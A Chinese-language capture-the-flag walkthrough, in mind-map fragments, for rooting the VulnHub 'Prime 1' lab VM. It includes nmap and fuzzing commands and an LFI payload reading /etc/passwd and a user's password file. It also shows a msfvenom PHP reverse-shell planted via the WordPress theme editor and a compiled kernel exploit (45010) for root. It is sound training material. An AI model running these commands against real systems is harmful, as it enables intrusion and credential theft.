https://www.vulnhub.com/entry/prime-1, 358/ 靶机 prime1 至少要有10G硬盘空间 用户名 victor,密码未知 环境 192.168.142.135 攻击机 kali v2021.2 目标 获得root的flag 主机发现 nmap 192.168.142.0/24 A段8位 11111111.00000000.00000000.00000000 子网掩码 怎么拿到靶机的IP? B段16位,11111111.11111111.00000000.00000000 C段24位,11111111.11111111.11111111.00000000 ping 扫描C段 nmap -sP 192.168.142.1/24 得到IP:192.168.142.138 端口和服务一一对应 开关机对比增加的IP 扫描端口 nmap -p 1-65535 -A 192.168.142.138 怎么发现服务? 80 http 得到服务 22 SSH SQL注入 如果有登录框 密码暴破 没有登录框,怎么发现其他文件/页面? 普通扫描 dirb http://192.168.142.138/ 第一步 http://192.168.142.138/dev 得到 http://192.168.142.138/index.php http://192.168.142.138/wordpress -X指定后缀扫描 目录扫描 dirb http://192.168.142.138 -X .txt,.php,.zip 第二步 dirb http://192.168.142.138/image.php 得到 没有内容 http://192.168.142.138/index.php http://192.168.142.138/secret.txt curl http://192.168.142.138/secret.txt 1)对于php文件做更多的fuzz,找到正确的参数 parameter 第三步 2)可以使用fuzz工具,比如git的:Fuzz_For_ Web 目录扫描 提示 3)如果还是卡在这一步,去学学OSCP( Offensive Security Certified Professional)—— 以Kali Linux 实际操作为主要内容的考试 4)如果找到location.txt的位置,就知道下一步 怎么做(先记住它,后面会用到) dirsearch 御剑 其他工具 Burp Suite 在kali的终端输入,启动图形化界面 dirbuster 随机 模糊测试 FUZZ 非法的内容 fuzz获得参数 测试index.php的参数 wfuzz -w /usr/share/wfuzz/wordlist/ general/common.txt http://192.168.142.138/ index.php?FUZZ 过滤12个Word的结果 wfuzz -c -w /usr/share/wfuzz/wordlist/ general/common.txt --hl 12 http://192.168. 142.138/index.php?FUZZ=wuya 得到参数file http://192.168.142.138/index.php?file=??? curl http://192.168.142.138/index.php?file= location.txt 结合上一步提示 得到正确参数 secrettier360 Local File inclusion 本地文件包含漏洞 curl http://192.168.142.138/image.php? secrettier360=/etc/hosts 可以访问任意文件 /etc/passwd 用户名、密码x代替、用户ID、组ID、用户描 述、主目录、程序 /etc/shadow SHA512加密的密码文件 常见敏感文件 LFI 直奔密码文件 curl http://192.168.142.138/image.php? secrettier360=/etc/passwd saket:x:1001:1001:find password.txt file in my directory:/home/saket: 在用户描述中得到提示 查看文件 curl http://192.168.142.138/image.php? secrettier360=/home/saket/password.txt 得到密码 follow_the_ippsec vulnhub靶场-prime1(无涯) fuzz / 暴破 我有密码,但是没有用户名 wp专用工具扫描 cmseek -u http://192.168.142.138/wordpress/ cmseek cmseek -u http://www.coolshell.cn wpscan --url http://192.168.142.138/ wordpress/ --enumerate u wpscan http://192.168.142.138/wordpress/wp-admin/ 登录后台 victor和 follow_the_ippsec 登录 wordpress漏洞利用 主题编辑器(利用点) Appearance Theme Editor 内网IP 动态IP 反弹连接 没有用户名和密码 让靶机主动地连接到控制机,把命令反弹到靶机 1、自己写PHP shell,NC监听端口 反弹脚本 2、msf一站式服务 漏洞数据库 生成payload Metasploit Framework 获取攻击脚本 介绍 用户接口 msfconsole 用来生成payload msfvenom 生成PHP的反弹shell msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.142.135 lport=7777 -o shell.php kali:root> cat shell.php 参数要一致 msfconsole use exploit/multi/handler 监听利用 kali启动一个端口 set payload php/meterpreter/reverse_tcp msfconsole> set lhost 192.168.142.135 set lport 7777 流程 exploit 主题编辑器 把shell放到靶机wordpress 唯一可以编辑的php文件:secrect.php msf提权 删掉/*,写入生成的shell 浏览器访问这个shell http://192.168.142.138/wordpress/wpcontent/themes/twentynineteen/secret.php 反弹连接成功,进入meterpreter 用户是kali的root kali:root> msfconsole> msf的终端 meterpreter> 反弹连接的窗口 msfconsole进入 注意这里有四个执行命令的地方 shell> meterpreter中输入shell进入 获取靶机信息 meterpreter> getuid www-data sysinfo OS : Linux ubuntu 4.10.0-28-generic # 32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 查找操作系统漏洞信息 msfconsole> searchsploit 16.04 Ubuntu 提权 cd /root kali:root> cp /usr/share/exploitdb/exploits/linux/local/ 45010.c ./ 在root用户的/root目录下复制攻击脚本 编译攻击脚本 gcc 45010.c -o 45010 得到可执行文件45010 上传攻击脚本到靶机 upload /root/45010 /tmp/45010 只有/tmp有权限 cd /tmp meterpreter> chmod +x 45010 shell命令进入shell wp禁止主题编辑 wp-config.php中 ./45010 运行可执行文件,获得root的权限 whoami root cd /root cat root.txt define( 'DISALLOW_FILE_EDIT', true ); 确定目标 域名、IP 信息收集 域名、IP、端口、目录扫描、搜索引擎、网络空 间搜索引擎、Git…… msf 渗透测试的流程 shell> nessus 漏洞扫描 appscan …… 漏洞利用 形成报告 提权 主机发现 获得flag